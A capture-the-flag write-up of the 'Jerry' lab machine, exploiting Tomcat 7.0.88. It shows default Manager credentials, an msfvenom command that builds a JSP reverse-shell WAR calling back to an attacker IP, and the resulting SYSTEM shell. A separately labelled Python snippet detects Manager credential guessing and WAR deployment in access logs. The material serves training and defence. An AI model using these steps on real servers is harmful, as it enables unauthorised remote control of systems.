
Jerry

Jerry is a straightforward Windows machine running an outdated Apache Tomcat instance. The attack path involves authenticating to the Tomcat Manager with default credentials, deploying a malicious WAR file for remote code execution, and landing directly as NT AUTHORITY\SYSTEM - no privilege escalation required.

Machine: Jerry
Difficulty: Easy
OS: Windows
Released on: 30th June, 2018
Created by: mrh4sh

Attack Chain

Nmap → Port 8080 (Tomcat 7.0.88)
  → /manager/html → 403 leaks default creds (tomcat:s3cret)
    → Manager access → WAR file upload
      → JSP reverse shell → RCE as NT AUTHORITY\SYSTEM
        → C:\Users\Administrator\Desktop\flags\ → user + root flags

Reconnaissance

Starting with a full port scan:

Nmap scan report for 10.129.136.9
Host is up, received echo-reply ttl 127 (0.18s latency).
Scanned at 2026-06-11 19:53:15 EAT for 378s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Apache Tomcat/7.0.88
|_http-server-header: Apache-Coyote/1.1

Only one port is identified as open (8080) running Apache Tomcat 7.0.88 on Windows Server 2012 R2.

Navigating to http://10.129.136.9:8080 confirms the default Tomcat welcome page.


Clicking Manager App redirects to /manager/html, which returns a 403 Access Denied. Crucially, the error page itself leaks a hint: its example configuration snippet contains the credentials tomcat:s3cret.

Foothold - Tomcat Manager Access

Navigating to http://10.129.136.9:8080/manager/html triggers HTTP Basic Auth. Using the credentials leaked in the 403 page:

Username: tomcat
Password: s3cret


Access granted to the Tomcat Web Application Manager.


Exploitation - Malicious WAR Deployment

With manager access, the path to RCE is deploying a malicious .war file (a Java web application archive). Generate a JSP reverse shell payload using msfvenom as follows:

➜  msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.15.192 LPORT=4444 -f war -o shell.war
Payload size: 1093 bytes
Final size of war file: 1093 bytes
Saved as: shell.war

In the Manager UI, under WAR file to deploy:

  1. Click Browse and select shell.war
  2. Click Deploy

The application appears in the list as /shell with status Running.


Set up the listener:

➜  listen
[*] Listening on 10.10.15.192:4444
listening on [any] 4444 ...

Trigger the shell by browsing to http://10.129.136.9:8080/shell/ :

Shell & Flags

Connection received:

➜  listen
[*] Listening on 10.10.15.192:4444
listening on [any] 4444 ...
connect to [10.10.15.192] from (UNKNOWN) [10.129.136.9] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system

C:\apache-tomcat-7.0.88>

The shell lands directly as NT AUTHORITY\SYSTEM, which shows the Tomcat service was running under the highest-privilege account on the box, so no privilege escalation is needed.
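A defender-side check for the chain above, added here as an example and not part of the original write-up: it parses Tomcat's default access-log pattern (the sample lines are constructed, not the machine's real logs) and flags repeated denied requests to /manager/ followed by a successful WAR deploy through the Manager's upload or deploy endpoints. The failure threshold and the endpoint list are assumptions.

```python
import re
from collections import Counter

# Constructed sample lines in Tomcat's default AccessLogValve pattern
# (%h %l %u %t "%r" %s %b). Not real logs from the machine in the write-up.
SAMPLE_LOG = """\
10.10.15.192 - - [11/Jun/2026:19:54:10 +0300] "GET /manager/html HTTP/1.1" 401 2473
10.10.15.192 - - [11/Jun/2026:19:54:12 +0300] "GET /manager/html HTTP/1.1" 401 2473
10.10.15.192 - admin [11/Jun/2026:19:54:15 +0300] "GET /manager/html HTTP/1.1" 403 3446
10.10.15.192 - tomcat [11/Jun/2026:19:55:01 +0300] "GET /manager/html HTTP/1.1" 200 16504
10.10.15.192 - tomcat [11/Jun/2026:19:55:40 +0300] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=X HTTP/1.1" 200 17021
10.10.15.192 - - [11/Jun/2026:19:56:02 +0300] "GET /shell/ HTTP/1.1" 200 -
10.129.136.9 - tomcat [11/Jun/2026:20:10:00 +0300] "GET /manager/status HTTP/1.1" 200 8192
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# Manager endpoints that create or replace a web application: the HTML form
# upload/deploy, the text interface, and PUT-style deploy (assumed list).
DEPLOY_RE = re.compile(r'^/manager/(html/(upload|deploy)|text/deploy|deploy)(\?|$)')

def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None

def detect(log_text, auth_fail_threshold=2):
    """Return (rule, source_ip, detail) tuples for suspicious Manager activity."""
    findings = []
    denied = Counter()
    for raw in log_text.splitlines():
        ev = parse(raw)
        if not ev:
            continue
        path, status = ev["path"], int(ev["status"])
        # Rule 1: repeated 401/403 on /manager/ from one source (credential guessing).
        if path.startswith("/manager/") and status in (401, 403):
            denied[ev["ip"]] += 1
            if denied[ev["ip"]] == auth_fail_threshold:
                findings.append(("manager_auth_failures", ev["ip"],
                                 f"{auth_fail_threshold}+ denied requests"))
        # Rule 2: any successful deploy through the Manager (new WAR landed).
        if DEPLOY_RE.match(path) and 200 <= status < 300:
            findings.append(("war_deploy", ev["ip"],
                             f'user={ev["user"]} {ev["method"]} {path.split("?")[0]}'))
    return findings
```

Run `detect(SAMPLE_LOG)` to see both rules fire for the source that guessed credentials and then deployed a WAR, while the routine /manager/status request from the other host is ignored.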

Navigate to the flags directory, C:\Users\Administrator\Desktop\flags\. Both flags are in a single file.

This post is licensed under CC BY 4.0 by the author.